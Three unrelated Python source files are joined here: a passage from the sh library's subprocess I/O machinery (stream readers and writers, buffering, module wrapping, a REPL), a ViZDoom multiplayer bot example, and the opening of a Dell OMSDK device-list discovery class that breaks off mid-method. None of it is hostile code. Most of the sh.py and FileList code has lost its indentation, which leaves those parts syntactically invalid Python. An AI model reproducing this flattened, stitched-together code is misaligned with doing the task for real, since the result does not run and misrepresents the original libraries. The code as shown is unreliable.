# into this pipe queue, to be consumed in real time (hence the
# thread-safe Queue), or at a potentially later time
self._pipe_queue = Queue()
# this is used to prevent a race condition when we're waiting for
# a process to end, and the OProc's internal threads are also checking
            # for the process's end
self._wait_lock = threading.Lock()
# these are for aggregating the stdout and stderr. we use a deque
# because we don't want to overflow
self._stdout = deque(maxlen=self.call_args["internal_bufsize"])
self._stderr = deque(maxlen=self.call_args["internal_bufsize"])
if self.call_args["tty_in"]:
setwinsize(self._stdin_fd, self.call_args["tty_size"])
self.log = parent_log.get_child("process", repr(self))
os.close(self._slave_stdin_fd)
if not self._single_tty:
os.close(self._slave_stdout_fd)
if stderr is not OProc.STDOUT:
os.close(self._slave_stderr_fd)
self.log.debug("started process")
if self.call_args["tty_in"]:
attr = termios.tcgetattr(self._stdin_fd)
attr[3] &= ~termios.ECHO
termios.tcsetattr(self._stdin_fd, termios.TCSANOW, attr)
# this represents the connection from a Queue object (or whatever
# we're using to feed STDIN) to the process's STDIN fd
self._stdin_stream = None
if not isinstance(self.stdin, OProc):
self._stdin_stream = \
StreamWriter(self.log.get_child("streamwriter",
"stdin"), self._stdin_fd, self.stdin,
self.call_args["in_bufsize"],
self.call_args["encoding"],
self.call_args["tty_in"])
stdout_pipe = None
if pipe is OProc.STDOUT and not self.call_args["no_pipe"]:
stdout_pipe = self._pipe_queue
# this represents the connection from a process's STDOUT fd to
# wherever it has to go, sometimes a pipe Queue (that we will use
# to pipe data to other processes), and also an internal deque
# that we use to aggregate all the output
save_stdout = not self.call_args["no_out"] and \
(self.call_args["tee"] in (True, "out") or stdout is None)
            # if we're piping directly into another process's file descriptor, we
            # bypass reading from the stdout stream altogether, because we've
            # already hooked up this process's stdout fd to the other
            # process's stdin fd
self._stdout_stream = None
if self.call_args["piped"] != "direct":
if callable(stdout):
stdout = construct_streamreader_callback(self, stdout)
self._stdout_stream = \
StreamReader(self.log.get_child("streamreader",
"stdout"), self._stdout_fd, stdout, self._stdout,
self.call_args["out_bufsize"],
self.call_args["encoding"],
self.call_args["decode_errors"], stdout_pipe,
save_data=save_stdout)
if stderr is OProc.STDOUT or self._single_tty:
self._stderr_stream = None
else:
stderr_pipe = None
if pipe is OProc.STDERR and not self.call_args["no_pipe"]:
stderr_pipe = self._pipe_queue
save_stderr = not self.call_args["no_err"] and \
(self.call_args["tee"] in ("err",) or stderr is None)
if callable(stderr):
stderr = construct_streamreader_callback(self, stderr)
self._stderr_stream = StreamReader(Logger("streamreader"),
self._stderr_fd, stderr, self._stderr,
self.call_args["err_bufsize"], self.call_args["encoding"],
self.call_args["decode_errors"], stderr_pipe,
save_data=save_stderr)
# start the main io threads
# stdin thread is not needed if we are connecting from another process's stdout pipe
self._input_thread = None
if self._stdin_stream:
self._input_thread = _start_daemon_thread(self.input_thread,
self._stdin_stream)
self._output_thread = _start_daemon_thread(self.output_thread,
self._stdout_stream, self._stderr_stream,
self.call_args["timeout"], self.started,
self.call_args["timeout_signal"])
def __repr__(self):
return "<Process %d %r>" % (self.pid, self.cmd[:500])
def change_in_bufsize(self, buf):
self._stdin_stream.stream_bufferer.change_buffering(buf)
def change_out_bufsize(self, buf):
self._stdout_stream.stream_bufferer.change_buffering(buf)
def change_err_bufsize(self, buf):
self._stderr_stream.stream_bufferer.change_buffering(buf)
def input_thread(self, stdin):
""" this is run in a separate thread. it writes into our process's
        stdin (a streamwriter) and waits for the process to end AND for
        everything that can be written to be written """
done = False
while not done and self.is_alive():
self.log.debug("%r ready for more input", stdin)
done = stdin.write()
stdin.close()
def output_thread(self, stdout, stderr, timeout, started, timeout_exc):
""" this function is run in a separate thread. it reads from the
process's stdout stream (a streamreader), and waits for it to claim that
its done """
readers = []
errors = []
if stdout is not None:
readers.append(stdout)
errors.append(stdout)
if stderr is not None:
readers.append(stderr)
errors.append(stderr)
# this is our select loop for polling stdout or stderr that is ready to
        # be read and processed. if one of those streamreaders indicates that it
# is done altogether being read from, we remove it from our list of
# things to poll. when no more things are left to poll, we leave this
# loop and clean up
while readers:
outputs, inputs, err = select.select(readers, [], errors, 0.1)
# stdout and stderr
for stream in outputs:
self.log.debug("%r ready to be read from", stream)
done = stream.read()
if done:
readers.remove(stream)
for stream in err:
pass
# test if the process has been running too long
if timeout:
now = time.time()
if now - started > timeout:
self.log.debug("we've been running too long")
self.timed_out = True
self.signal(timeout_exc)
# this is here because stdout may be the controlling TTY, and
# we can't close it until the process has ended, otherwise the
# child will get SIGHUP. typically, if we've broken out of
# the above loop, and we're here, the process is just about to
# end, so it's probably ok to aggressively poll self.is_alive()
#
# the other option to this would be to do the CTTY close from
# the method that does the actual os.waitpid() call, but the
# problem with that is that the above loop might still be
# running, and closing the fd will cause some operation to
# fail. this is less complex than wrapping all the ops
# in the above loop with out-of-band fd-close exceptions
while self.is_alive():
time.sleep(0.001)
if stdout:
stdout.close()
if stderr:
stderr.close()
@property
def stdout(self):
return "".encode(self.call_args["encoding"]).join(self._stdout)
@property
def stderr(self):
return "".encode(self.call_args["encoding"]).join(self._stderr)
def signal(self, sig):
self.log.debug("sending signal %d", sig)
try:
os.kill(self.pid, sig)
except OSError:
pass
def kill(self):
self.log.debug("killing")
self.signal(signal.SIGKILL)
def terminate(self):
self.log.debug("terminating")
self.signal(signal.SIGTERM)
def is_alive(self):
""" polls if our child process has completed, without blocking. this
method has side-effects, such as setting our exit_code, if we happen to
see our child exit while this is running """
if self.exit_code is not None:
return False
# what we're doing here essentially is making sure that the main thread
# (or another thread), isn't calling .wait() on the process. because
# .wait() calls os.waitpid(self.pid, 0), we can't do an os.waitpid
# here...because if we did, and the process exited while in this
# thread, the main thread's os.waitpid(self.pid, 0) would raise OSError
# (because the process ended in another thread).
#
# so essentially what we're doing is, using this lock, checking if
# we're calling .wait(), and if we are, let .wait() get the exit code
# and handle the status, otherwise let us do it.
acquired = self._wait_lock.acquire(False)
if not acquired:
if self.exit_code is not None:
return False
return True
try:
# WNOHANG is just that...we're calling waitpid without hanging...
# essentially polling the process. the return result is (0, 0) if
# there's no process status, so we check that pid == self.pid below
# in order to determine how to proceed
pid, exit_code = os.waitpid(self.pid, os.WNOHANG)
if pid == self.pid:
self.exit_code = handle_process_exit_code(exit_code)
return False
# no child process
except OSError:
return False
else:
return True
finally:
self._wait_lock.release()
def wait(self):
""" waits for the process to complete, handles the exit code """
self.log.debug("acquiring wait lock to wait for completion")
# using the lock in a with-context blocks, which is what we want if
# we're running wait()
with self._wait_lock:
self.log.debug("got wait lock")
if self.exit_code is None:
self.log.debug("exit code not set, waiting on pid")
pid, exit_code = os.waitpid(self.pid, 0) # blocks
self.exit_code = handle_process_exit_code(exit_code)
else:
self.log.debug("exit code already set (%d), no need to wait", self.exit_code)
# we may not have a thread for stdin, if the pipe has been connected
# via _piped="direct"
if self._input_thread:
self._input_thread.join()
# wait for our stdout and stderr streamreaders to finish reading and
# aggregating the process output
self._output_thread.join()
return self.exit_code
class DoneReadingForever(Exception): pass
class NotYetReadyToRead(Exception): pass
def determine_how_to_read_input(input_obj):
""" given some kind of input object, return a function that knows how to
read chunks of that input object.
    each reader function returns a chunk of data, and raises a DoneReadingForever
    exception (or returns None) when there's no more data to read
NOTE: the function returned does not need to care much about the requested
buffering type (eg, unbuffered vs newline-buffered). the StreamBufferer
will take care of that. these functions just need to return a
reasonably-sized chunk of data. """
get_chunk = None
if isinstance(input_obj, Queue):
log_msg = "queue"
get_chunk = get_queue_chunk_reader(input_obj)
elif callable(input_obj):
log_msg = "callable"
get_chunk = get_callable_chunk_reader(input_obj)
# also handles stringio
elif hasattr(input_obj, "read"):
log_msg = "file descriptor"
get_chunk = get_file_chunk_reader(input_obj)
elif isinstance(input_obj, basestring):
log_msg = "string"
get_chunk = get_iter_string_reader(input_obj)
else:
log_msg = "general iterable"
get_chunk = get_iter_chunk_reader(iter(input_obj))
return get_chunk, log_msg
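# Editor's sketch (hedged) of the dispatch above:
#   Queue()             -> queue reader    (a None item ends input forever)
#   lambda: b"data"     -> callable reader (any exception ends input)
#   open(path, "rb")    -> file reader     (1024-byte chunks)
#   "a string"          -> string reader   (1024-char slices)
#   iter([b"a", b"b"])  -> iterable reader (StopIteration ends input)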
def get_queue_chunk_reader(stdin):
def fn():
try:
chunk = stdin.get(True, 0.01)
except Empty:
raise NotYetReadyToRead
if chunk is None:
raise DoneReadingForever
return chunk
return fn
def get_callable_chunk_reader(stdin):
def fn():
try:
return stdin()
except:
raise DoneReadingForever
return fn
def get_iter_string_reader(stdin):
""" return an iterator that returns a chunk of a string every time it is
called. notice that even though bufsize_type might be line buffered, we're
not doing any line buffering here. that's because our StreamBufferer
handles all buffering. we just need to return a reasonable-sized chunk. """
bufsize = 1024
iter_str = (stdin[i:i + bufsize] for i in range(0, len(stdin), bufsize))
return get_iter_chunk_reader(iter_str)
def get_iter_chunk_reader(stdin):
def fn():
try:
if IS_PY3:
chunk = stdin.__next__()
else:
chunk = stdin.next()
return chunk
except StopIteration:
raise DoneReadingForever
return fn
def get_file_chunk_reader(stdin):
bufsize = 1024
def fn():
chunk = stdin.read(bufsize)
if not chunk:
raise DoneReadingForever
else:
return chunk
return fn
def bufsize_type_to_bufsize(bf_type):
""" for a given bufsize type, return the actual bufsize we will read.
notice that although 1 means "newline-buffered", we're reading a chunk size
of 1024. this is because we have to read something. we let a
StreamBufferer instance handle splitting our chunk on newlines """
# newlines
if bf_type == 1:
bufsize = 1024
# unbuffered
elif bf_type == 0:
bufsize = 1
# or buffered by specific amount
else:
bufsize = bf_type
return bufsize
class StreamWriter(object):
""" StreamWriter reads from some input (the stdin param) and writes to a fd
(the stream param). the stdin may be a Queue, a callable, something with
the "read" method, a string, or an iterable """
def __init__(self, log, stream, stdin, bufsize_type, encoding, tty_in):
self.stream = stream
self.stdin = stdin
self.log = log
self.encoding = encoding
self.tty_in = tty_in
self.stream_bufferer = StreamBufferer(bufsize_type, self.encoding)
self.get_chunk, log_msg = determine_how_to_read_input(stdin)
self.log.debug("parsed stdin as a %s", log_msg)
def fileno(self):
""" defining this allows us to do select.select on an instance of this
class """
return self.stream
def write(self):
""" attempt to get a chunk of data to write to our child process's
        stdin, then write it. the return value answers the question "are we
        done writing forever?" """
        # get_chunk may sometimes return bytes, and sometimes returns strings
# because of the nature of the different types of STDIN objects we
# support
try:
chunk = self.get_chunk()
if chunk is None:
raise DoneReadingForever
except DoneReadingForever:
self.log.debug("done reading")
if self.tty_in:
# EOF time
try:
char = termios.tcgetattr(self.stream)[6][termios.VEOF]
except:
char = chr(4).encode()
os.write(self.stream, char)
return True
except NotYetReadyToRead:
self.log.debug("received no data")
return False
# if we're not bytes, make us bytes
if IS_PY3 and hasattr(chunk, "encode"):
chunk = chunk.encode(self.encoding)
for proc_chunk in self.stream_bufferer.process(chunk):
self.log.debug("got chunk size %d: %r", len(proc_chunk),
proc_chunk[:30])
self.log.debug("writing chunk to process")
try:
os.write(self.stream, proc_chunk)
except OSError:
self.log.debug("OSError writing stdin chunk")
return True
def close(self):
self.log.debug("closing, but flushing first")
chunk = self.stream_bufferer.flush()
self.log.debug("got chunk size %d to flush: %r", len(chunk), chunk[:30])
try:
if chunk:
os.write(self.stream, chunk)
            if not self.tty_in:
                self.log.debug("not using a TTY, so closing the stream")
os.close(self.stream)
except OSError:
pass
def determine_how_to_feed_output(handler, encoding, decode_errors):
if callable(handler):
process, finish = get_callback_chunk_consumer(handler, encoding,
decode_errors)
elif isinstance(handler, cStringIO):
process, finish = get_cstringio_chunk_consumer(handler)
elif isinstance(handler, StringIO):
process, finish = get_stringio_chunk_consumer(handler, encoding,
decode_errors)
elif hasattr(handler, "write"):
process, finish = get_file_chunk_consumer(handler)
else:
process = lambda chunk: False
finish = lambda: None
return process, finish
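# Editor's sketch (hedged) of the dispatch above:
#   callable          -> chunks are decoded if possible, then passed to it
#   cStringIO/BytesIO -> raw bytes written
#   StringIO          -> chunks decoded with the command's encoding first
#   file-like (write) -> bytes written and flushed per chunk
#   anything else     -> chunks are dropped (no-op consumer)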
def get_file_chunk_consumer(handler):
def process(chunk):
handler.write(chunk)
# we should flush on an fd. chunk is already the correctly-buffered
# size, so we don't need the fd buffering as well
handler.flush()
return False
def finish():
if hasattr(handler, "flush"):
handler.flush()
return process, finish
def get_callback_chunk_consumer(handler, encoding, decode_errors):
def process(chunk):
# try to use the encoding first, if that doesn't work, send
# the bytes, because it might be binary
try:
chunk = chunk.decode(encoding, decode_errors)
except UnicodeDecodeError:
pass
return handler(chunk)
def finish():
pass
return process, finish
def get_cstringio_chunk_consumer(handler):
def process(chunk):
handler.write(chunk)
return False
def finish():
pass
return process, finish
def get_stringio_chunk_consumer(handler, encoding, decode_errors):
def process(chunk):
handler.write(chunk.decode(encoding, decode_errors))
return False
def finish():
pass
return process, finish
class StreamReader(object):
""" reads from some output (the stream) and sends what it just read to the
handler. """
def __init__(self, log, stream, handler, buffer, bufsize_type, encoding,
decode_errors, pipe_queue=None, save_data=True):
self.stream = stream
self.buffer = buffer
self.save_data = save_data
self.encoding = encoding
self.decode_errors = decode_errors
self.pipe_queue = None
if pipe_queue:
self.pipe_queue = weakref.ref(pipe_queue)
self.log = log
self.stream_bufferer = StreamBufferer(bufsize_type, self.encoding,
self.decode_errors)
self.bufsize = bufsize_type_to_bufsize(bufsize_type)
self.process_chunk, self.finish_chunk_processor = \
determine_how_to_feed_output(handler, encoding, decode_errors)
self.should_quit = False
def fileno(self):
""" defining this allows us to do select.select on an instance of this
class """
return self.stream
def close(self):
chunk = self.stream_bufferer.flush()
self.log.debug("got chunk size %d to flush: %r", len(chunk), chunk[:30])
if chunk:
self.write_chunk(chunk)
self.finish_chunk_processor()
if self.pipe_queue and self.save_data:
self.pipe_queue().put(None)
try:
os.close(self.stream)
except OSError:
pass
def write_chunk(self, chunk):
# in PY3, the chunk coming in will be bytes, so keep that in mind
if not self.should_quit:
self.should_quit = self.process_chunk(chunk)
if self.save_data:
self.buffer.append(chunk)
if self.pipe_queue:
self.log.debug("putting chunk onto pipe: %r", chunk[:30])
self.pipe_queue().put(chunk)
def read(self):
# if we're PY3, we're reading bytes, otherwise we're reading
# str
try:
chunk = os.read(self.stream, self.bufsize)
except OSError as e:
self.log.debug("got errno %d, done reading", e.errno)
return True
if not chunk:
self.log.debug("got no chunk, done reading")
return True
self.log.debug("got chunk size %d: %r", len(chunk), chunk[:30])
for chunk in self.stream_bufferer.process(chunk):
self.write_chunk(chunk)
class StreamBufferer(object):
""" this is used for feeding in chunks of stdout/stderr, and breaking it up
into chunks that will actually be put into the internal buffers. for
example, if you have two processes, one being piped to the other, and you
want that, first process to feed lines of data (instead of the chunks
however they come in), OProc will use an instance of this class to chop up
the data and feed it as lines to be sent down the pipe """
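    # illustrative example of line buffering (type 1), traced from process()
    # below; partial lines are held back until a newline arrives:
    #
    #     b = StreamBufferer(1)
    #     b.process(b"ab\ncd")   # -> [b"ab\n"]   (b"cd" stays buffered)
    #     b.process(b"ef\n")     # -> [b"cdef\n"]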
def __init__(self, buffer_type, encoding=DEFAULT_ENCODING,
decode_errors="strict"):
# 0 for unbuffered, 1 for line, everything else for that amount
self.type = buffer_type
self.buffer = []
self.n_buffer_count = 0
self.encoding = encoding
self.decode_errors = decode_errors
        # this is for if we change buffering types. if we change from line
        # buffered to unbuffered, it's very possible that our self.buffer list
        # has data that was being saved up (while we searched for a newline).
        # we need to use that up, so we don't lose it
        self._use_up_buffer_first = False
        # the buffering lock is used because we might change the buffering
        # types from a different thread. for example, if we have a stdout
        # callback, we might use it to change the way stdin buffers. so we
        # lock
self._buffering_lock = threading.RLock()
self.log = Logger("stream_bufferer")
def change_buffering(self, new_type):
# TODO, when we stop supporting 2.6, make this a with context
self.log.debug("acquiring buffering lock for changing buffering")
self._buffering_lock.acquire()
self.log.debug("got buffering lock for changing buffering")
try:
if new_type == 0:
self._use_up_buffer_first = True
self.type = new_type
finally:
self._buffering_lock.release()
self.log.debug("released buffering lock for changing buffering")
def process(self, chunk):
# MAKE SURE THAT THE INPUT IS PY3 BYTES
# THE OUTPUT IS ALWAYS PY3 BYTES
# TODO, when we stop supporting 2.6, make this a with context
self.log.debug("acquiring buffering lock to process chunk (buffering: %d)", self.type)
self._buffering_lock.acquire()
self.log.debug("got buffering lock to process chunk (buffering: %d)", self.type)
try:
# we've encountered binary, permanently switch to N size buffering
# since matching on newline doesn't make sense anymore
if self.type == 1:
try:
chunk.decode(self.encoding, self.decode_errors)
                except UnicodeDecodeError:
self.log.debug("detected binary data, changing buffering")
self.change_buffering(1024)
# unbuffered
if self.type == 0:
if self._use_up_buffer_first:
self._use_up_buffer_first = False
to_write = self.buffer
self.buffer = []
to_write.append(chunk)
return to_write
return [chunk]
# line buffered
# we must decode the bytes before we try to match on newline
elif self.type == 1:
total_to_write = []
chunk = chunk.decode(self.encoding, self.decode_errors)
while True:
newline = chunk.find("\n")
if newline == -1:
break
chunk_to_write = chunk[:newline + 1]
if self.buffer:
# this is ugly, but it's designed to take the existing
# bytes buffer, join it together, tack on our latest
# chunk, then convert the whole thing to a string.
# it's necessary, i'm sure. read the whole block to
# see why.
chunk_to_write = "".encode(self.encoding).join(self.buffer) \
+ chunk_to_write.encode(self.encoding)
chunk_to_write = chunk_to_write.decode(self.encoding)
self.buffer = []
self.n_buffer_count = 0
chunk = chunk[newline + 1:]
total_to_write.append(chunk_to_write.encode(self.encoding))
if chunk:
self.buffer.append(chunk.encode(self.encoding))
self.n_buffer_count += len(chunk)
return total_to_write
# N size buffered
else:
total_to_write = []
while True:
overage = self.n_buffer_count + len(chunk) - self.type
if overage >= 0:
ret = "".encode(self.encoding).join(self.buffer) + chunk
chunk_to_write = ret[:self.type]
chunk = ret[self.type:]
total_to_write.append(chunk_to_write)
self.buffer = []
self.n_buffer_count = 0
else:
self.buffer.append(chunk)
self.n_buffer_count += len(chunk)
break
return total_to_write
finally:
self._buffering_lock.release()
self.log.debug("released buffering lock for processing chunk (buffering: %d)", self.type)
def flush(self):
self.log.debug("acquiring buffering lock for flushing buffer")
self._buffering_lock.acquire()
self.log.debug("got buffering lock for flushing buffer")
try:
ret = "".encode(self.encoding).join(self.buffer)
self.buffer = []
return ret
finally:
self._buffering_lock.release()
self.log.debug("released buffering lock for flushing buffer")
@contextmanager
def pushd(path):
""" pushd is just a specialized form of args, where we're passing in the
current working directory """
with args(_cwd=path):
yield
@contextmanager
def args(*args, **kwargs):
""" allows us to temporarily override all the special keyword parameters in
a with context """
call_args = Command._call_args
old_args = call_args.copy()
for key,value in kwargs.items():
key = key.lstrip("_")
call_args[key] = value
yield
call_args.update(old_args)
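# usage sketch for the two context managers above (illustrative; assumes sh is
# importable and "ls" exists on PATH):
#
#     import sh
#     with sh.pushd("/tmp"):
#         sh.ls()    # runs with _cwd=/tmp
#     with sh.args(_env={"PATH": "/usr/bin"}):
#         sh.ls()    # runs with the overridden default _env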
class Environment(dict):
""" this allows lookups to names that aren't found in the global scope to be
searched for as a program name. for example, if "ls" isn't found in this
module's scope, we consider it a system program and try to find it.
we use a dict instead of just a regular object as the base class because the
exec() statement used in this file requires the "globals" argument to be a
dictionary """
# this is a list of all of the names that the sh module exports that will
# not resolve to functions. we don't want to accidentally shadow real
# commands with functions/imports that we define in sh.py. for example,
# "import time" may override the time system program
whitelist = set([
"Command",
"CommandNotFound",
"DEFAULT_ENCODING",
"DoneReadingForever",
"ErrorReturnCode",
"NotYetReadyToRead",
"SignalException",
"TimeoutException",
"__project_url__",
"__version__",
"args",
"glob",
"pushd",
])
def __init__(self, globs, baked_args={}):
self.globs = globs
self.baked_args = baked_args
self.disable_whitelist = False
def __setitem__(self, k, v):
self.globs[k] = v
def __getitem__(self, k):
# if we first import "_disable_whitelist" from sh, we can import
# anything defined in the global scope of sh.py. this is useful for our
# tests
if k == "_disable_whitelist":
self.disable_whitelist = True
return None
# we're trying to import something real (maybe), see if it's in our
# global scope
if k in self.whitelist or self.disable_whitelist:
try:
return self.globs[k]
except KeyError:
pass
# somebody tried to be funny and do "from sh import *"
if k == "__all__":
raise AttributeError("Cannot import * from sh. \
Please import sh or import programs individually.")
# check if we're naming a dynamically generated ReturnCode exception
exc = get_exc_from_name(k)
if exc:
return exc
# https://github.com/ipython/ipython/issues/2577
# https://github.com/amoffat/sh/issues/97#issuecomment-10610629
if k.startswith("__") and k.endswith("__"):
raise AttributeError
# how about an environment variable?
try:
return os.environ[k]
except KeyError:
pass
# is it a custom builtin?
builtin = getattr(self, "b_" + k, None)
if builtin:
return builtin
# it must be a command then
# we use _create instead of instantiating the class directly because
# _create uses resolve_program, which will automatically do underscore-
# to-dash conversions. instantiating directly does not use that
return Command._create(k, **self.baked_args)
# methods that begin with "b_" are custom builtins and will override any
# program that exists in our path. this is useful for things like
# common shell builtins that people are used to, but which aren't actually
# full-fledged system binaries
def b_cd(self, path):
os.chdir(path)
def b_which(self, program):
return which(program)
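# name resolution order in Environment.__getitem__ above: whitelisted module
# globals, dynamically generated ReturnCode exceptions, environment variables,
# "b_" builtins (so sh.cd hits b_cd rather than a binary), and finally a PATH
# lookup via Command._create, which also maps underscores to dashes
# (e.g. sh.google_chrome -> "google-chrome")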
def run_repl(env): # pragma: no cover
banner = "\n>> sh v{version}\n>> https://github.com/amoffat/sh\n"
print(banner.format(version=__version__))
while True:
try:
line = raw_input("sh> ")
except (ValueError, EOFError):
break
try:
exec(compile(line, "<dummy>", "single"), env, env)
except SystemExit:
break
except:
print(traceback.format_exc())
# cleans up our last line
print("")
# this is a thin wrapper around THIS module (we patch sys.modules[__name__]).
# this is in the case that the user does a "from sh import whatever"
# in other words, they only want to import certain programs, not the whole
# system PATH worth of commands. in this case, we just proxy the
# import lookup to our Environment class
class SelfWrapper(ModuleType):
def __init__(self, self_module, baked_args={}):
# this is super ugly to have to copy attributes like this,
# but it seems to be the only way to make reload() behave
# nicely. if i make these attributes dynamic lookups in
# __getattr__, reload sometimes chokes in weird ways...
for attr in ["__builtins__", "__doc__", "__name__", "__package__"]:
setattr(self, attr, getattr(self_module, attr, None))
# python 3.2 (2.7 and 3.3 work fine) breaks on osx (not ubuntu)
# if we set this to None. and 3.3 needs a value for __path__
self.__path__ = []
self.__self_module = self_module
self.__env = Environment(globals(), baked_args)
def __setattr__(self, name, value):
if hasattr(self, "__env"):
self.__env[name] = value
else:
ModuleType.__setattr__(self, name, value)
def __getattr__(self, name):
if name == "__env":
raise AttributeError
return self.__env[name]
    # accept special keyword arguments to define defaults for all operations
    # performed through the returned SelfWrapper
def __call__(self, **kwargs):
return SelfWrapper(self.__self_module, kwargs)
# we're being run as a stand-alone script
if __name__ == "__main__": # pragma: no cover
    try:
        arg = sys.argv.pop(1)
    except IndexError:
        arg = None
if arg == "test":
import subprocess
def run_test(version, locale):
py_version = "python%s" % version
py_bin = which(py_version)
if py_bin:
print("Testing %s, locale %r" % (py_version.capitalize(),
locale))
env = os.environ.copy()
env["LANG"] = locale
p = subprocess.Popen([py_bin, os.path.join(THIS_DIR, "test.py")]
+ sys.argv[1:], env=env)
return_code = p.wait()
if return_code != 0:
exit(1)
else:
print("Couldn't find %s, skipping" % py_version.capitalize())
versions = ("2.6", "2.7", "3.1", "3.2", "3.3", "3.4")
locales = ("en_US.UTF-8", "C")
for locale in locales:
for version in versions:
run_test(version, locale)
else:
env = Environment(globals())
run_repl(env)
# we're being imported from somewhere
else:
self = sys.modules[__name__]
sys.modules[__name__] = SelfWrapper(self)
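# what the module swap above enables (illustrative sketch):
#
#     import sh                  # sh is now a SelfWrapper instance
#     sh.echo("hi")              # attribute access resolves to a Command
#     from sh import ls          # per-program imports are proxied the same way
#     sh2 = sh(_tty_out=False)   # SelfWrapper.__call__ bakes default kwargs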
|
multiple_instances_advance.py
|
#!/usr/bin/env python3
import os
from random import choice, random
from time import sleep, time
import vizdoom as vzd
# For multiplayer games use processes (ZDoom's multiplayer sync mechanism prevents threads from working as expected).
from multiprocessing import cpu_count, Process
# For singleplayer games threads can also be used.
# from threading import Thread
# Config
episodes = 1
timelimit = 1 # minutes
players = 8 # number of players
skip = 4
mode = vzd.Mode.PLAYER # or Mode.ASYNC_PLAYER
ticrate = 2 * vzd.DEFAULT_TICRATE # for Mode.ASYNC_PLAYER
random_sleep = True
const_sleep_time = 0.005
window = True
resolution = vzd.ScreenResolution.RES_320X240
args =""
console = False
config = os.path.join(vzd.scenarios_path, "cig.cfg")
def setup_player():
game = vzd.DoomGame()
game.load_config(config)
game.set_mode(mode)
game.add_game_args(args)
game.set_screen_resolution(resolution)
game.set_console_enabled(console)
game.set_window_visible(window)
game.set_ticrate(ticrate)
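    # each action is a one-hot vector over the buttons declared in cig.cfg
    # (presumably move left / move right / attack); make_action() takes one
    # of these per decision step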
    actions = [[1, 0, 0, 0, 0, 0, 0, 0, 0], [0, 1, 0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 0, 0, 0, 0, 0, 0]]
return game, actions
def player_action(game, player_sleep_time, actions, player_skip):
if random_sleep:
sleep(random() * 0.005 + 0.001)
elif player_sleep_time > 0:
sleep(player_sleep_time)
game.make_action(choice(actions), player_skip)
if game.is_player_dead():
game.respawn_player()
def player_host(p):
game, actions = setup_player()
game.add_game_args("-host " + str(p) + " -netmode 0 -deathmatch +timelimit " + str(timelimit) +
" +sv_spawnfarthest 1 +name Player0 +colorset 0")
game.add_game_args(args)
game.init()
action_count = 0
player_sleep_time = const_sleep_time
player_skip = skip
for i in range(episodes):
print("Episode #" + str(i + 1))
episode_start_time = None
while not game.is_episode_finished():
if episode_start_time is None:
episode_start_time = time()
state = game.get_state()
print("Player0:", state.number, action_count, game.get_episode_time())
player_action(game, player_sleep_time, actions, player_skip)
action_count += 1
print("Player0 frags:", game.get_game_variable(vzd.GameVariable.FRAGCOUNT))
print("Host: Episode finished!")
player_count = int(game.get_game_variable(vzd.GameVariable.PLAYER_COUNT))
        for player_i in range(1, player_count + 1):
            frag_var = getattr(vzd.GameVariable, "PLAYER" + str(player_i) + "_FRAGCOUNT")
            print("Host: Player" + str(player_i) + ":", game.get_game_variable(frag_var))
print("Host: Episode processing time:", time() - episode_start_time)
# Starts a new episode. All players have to call new_episode() in multiplayer mode.
game.new_episode()
game.close()
def player_join(p):
game, actions = setup_player()
game.add_game_args("-join 127.0.0.1 +name Player" + str(p) + " +colorset " + str(p))
game.add_game_args(args)
game.init()
action_count = 0
player_sleep_time = const_sleep_time
player_skip = skip
for i in range(episodes):
while not game.is_episode_finished():
state = game.get_state()
print("Player" + str(p) + ":", state.number, action_count, game.get_episode_time())
player_action(game, player_sleep_time, actions, player_skip)
action_count += 1
print("Player" + str(p) + " frags:", game.get_game_variable(vzd.GameVariable.FRAGCOUNT))
game.new_episode()
game.close()
if __name__ == '__main__':
print("Players:", players)
print("CPUS:", cpu_count())
processes = []
for i in range(1, players):
p_join = Process(target=player_join, args=(i,))
p_join.start()
processes.append(p_join)
player_host(players)
print("Done")
|
FileList.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# Copyright © 2018 Dell Inc. or its subsidiaries. All rights reserved.
# Dell, EMC, and other trademarks are trademarks of Dell Inc. or its subsidiaries.
# Other trademarks may be trademarks of their respective owners.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors: Vaideeswaran Ganesan
#
import os
import io
import logging
import threading
import time
from omsdk.sdkconsole import iConsoleRegistry, iConsoleDriver, iConsoleDiscovery
from omsdk.sdkprint import PrettyPrint
from omsdk.sdkproto import PCONSOLE
import sys
logger = logging.getLogger(__name__)
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3
# logging.basicConfig(level=logging.DEBUG,
# format='[%(levelname)s] (%(threadName)-10s) %(message)s',)
class FileList(iConsoleDiscovery):
def __init__(self, srcdir):
if PY2:
super(FileList, self).__init__(iConsoleRegistry("FileList", srcdir, None))
else:
super().__init__(iConsoleRegistry("FileList", srcdir, None))
self.protofactory.add(PCONSOLE(obj=self))
def my_entitytype(self, pinfra, listfile, creds, protofactory):
return FileListEntity(self.ref, pinfra, protofactory, listfile, creds)
class FileListEntity(iConsoleDriver):
def __init__(self, ref, pinfra, protofactory, listfile, creds):
if PY2:
super(FileListEntity, self).__init__(ref, protofactory, listfile, creds)
else:
super().__init__(ref, protofactory, listfile, creds)
self.listfile = listfile
self.maplist = {}
self.myentitylistlock = threading.Lock()
self.pinfra = pinfra
# SDK Infrastructure
self.entitylist = []
self.success = {}
self.failed = {}
def _worker(self, device):
logger.debug("Starting")
devEntity = self.pinfra.find_driver(device, self.creds, True)
with self.myentitylistlock:
            if devEntity is not None:
self.entitylist.append(devEntity)
# if devEntity is None:
# logger.debug("None is " + device)
# else:
# devEntity.get_entityjson()
logger.debug("Exiting")
def process(self):
self.threadlist = []
with open(self.listfile, "r") as mylist:
for line in mylist:
device = line.rstrip()
thr = threading.Thread(name=device, \
target=self._worker, args=(device,))
self.threadlist.append(thr)
thr.start()
logger.debug('Waiting for _worker threads')
for t in self.threadlist:
t.join()
for hgroup in self.maplist:
tst = {}
tst["Name"] = hgroup
tst["ID"] = hgroup
tst["Description"] = hgroup
tst["Devices"] = self.maplist[hgroup]
tst["DevicesCount"] = len(self.maplist[hgroup])
self.entityjson["topology"]["DeviceGroups"][hgroup] = tst
return self
def printx(self):
with self.myentitylistlock:
for device in self.entityjson["devices"]["Devices"]:
logger.debug("-======" + str(device) + "----------")
                if device is not None:
logger.debug(device.entityjson)
logger.debug("-==================-------")
def my_connect(self, pOptions):
status = False
try:
